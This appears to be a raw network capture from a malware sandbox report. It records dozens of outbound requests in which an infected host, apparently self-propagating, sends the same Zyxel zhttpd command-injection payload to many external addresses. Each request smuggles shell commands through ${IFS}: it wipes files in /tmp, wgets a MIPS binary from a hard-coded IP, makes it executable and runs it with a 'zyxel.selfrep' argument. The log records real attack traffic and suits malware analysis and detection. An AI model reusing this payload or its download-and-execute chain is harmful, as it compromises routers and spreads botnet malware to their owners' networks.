                                                        Jan 28, 2024 10:13:01.580276966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6643192.168.2.1438204160.89.35.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.580303907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6644192.168.2.1434540158.164.107.56443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.580349922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6645192.168.2.145496438.125.122.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.580379009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6646192.168.2.145120637.219.122.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.580416918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6647192.168.2.1459288201.66.166.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.580435038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6648192.168.2.144635844.138.50.29443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.580463886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6649192.168.2.143770054.73.13.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.580497026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6650192.168.2.1435944178.127.246.86443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.580517054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6651192.168.2.143858659.2.247.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.580560923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6652192.168.2.1455228170.0.73.103443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.580610991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6653192.168.2.1436976129.192.40.139443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.580642939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6654192.168.2.1438632102.253.137.86443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.580677986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6655192.168.2.144638257.231.43.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.580729961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6656192.168.2.146097860.140.40.159443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.580768108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6657192.168.2.1459572191.246.233.168443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.580796957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6658192.168.2.144058258.145.137.72443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.580838919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6659192.168.2.1446796194.195.88.213443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.580876112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6660192.168.2.1446946217.246.83.177443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.580915928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6661192.168.2.143344036.191.62.32443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.580935955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6662192.168.2.144149636.108.60.80443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.580977917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6663192.168.2.1433034111.30.105.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.581008911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6664192.168.2.1455000148.203.135.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.581046104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6665192.168.2.1453588170.94.98.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.581070900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6666192.168.2.1460142166.164.22.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.581104994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6667192.168.2.144555647.104.30.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.581154108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6668192.168.2.1444140211.81.131.86443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.581182003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6669192.168.2.1446076192.245.147.188443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.581207991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6670192.168.2.146077492.16.16.115443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.581248999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6671192.168.2.144865477.80.81.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.581280947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6672192.168.2.1450958204.57.139.151443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.581316948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6673192.168.2.144842676.178.78.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.581363916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6674192.168.2.143893687.66.166.213443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.581393003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6675192.168.2.1441956179.110.152.209443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.581432104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6676192.168.2.1435970117.9.4.58443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.581468105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6677192.168.2.143478635.244.30.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.581496000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6678192.168.2.1460890115.117.185.28443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.581532955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6679192.168.2.1455422181.22.228.169443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.581585884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6680192.168.2.1459894139.243.139.193443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.581653118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6681192.168.2.145232634.217.18.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.581701040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6682192.168.2.1450036204.214.72.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.581739902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6683192.168.2.1448410147.136.137.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.581758976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6684192.168.2.14482728.62.223.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.581806898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6685192.168.2.1452354220.173.126.234443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.581835032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6686192.168.2.144032898.27.217.153443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.581857920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6687192.168.2.1458990147.66.104.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.581917048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6688192.168.2.1439092171.69.62.245443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.581938982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6689192.168.2.145721647.67.41.5443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.581965923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6690192.168.2.145437817.147.202.197443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.582007885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6691192.168.2.1441842123.104.9.98443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.582045078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6692192.168.2.145970245.49.126.28443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.582072973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6693192.168.2.145200891.95.128.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.582118034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6694192.168.2.1433138110.75.25.59443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.582146883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6695192.168.2.145407240.145.6.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.582195044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6696192.168.2.1436276222.161.58.152443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.582246065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6697192.168.2.144598472.5.91.142443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.582282066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6698192.168.2.1446406163.159.43.127443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.582317114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6699192.168.2.143371097.251.245.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.582355022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6700192.168.2.1436564188.131.139.60443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.582391024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6701192.168.2.1436376159.181.190.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.582447052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6702192.168.2.143418499.27.220.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:01.582474947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6703192.168.2.1454944146.64.6.104443
                                                        TimestampBytes transferredDirectionData
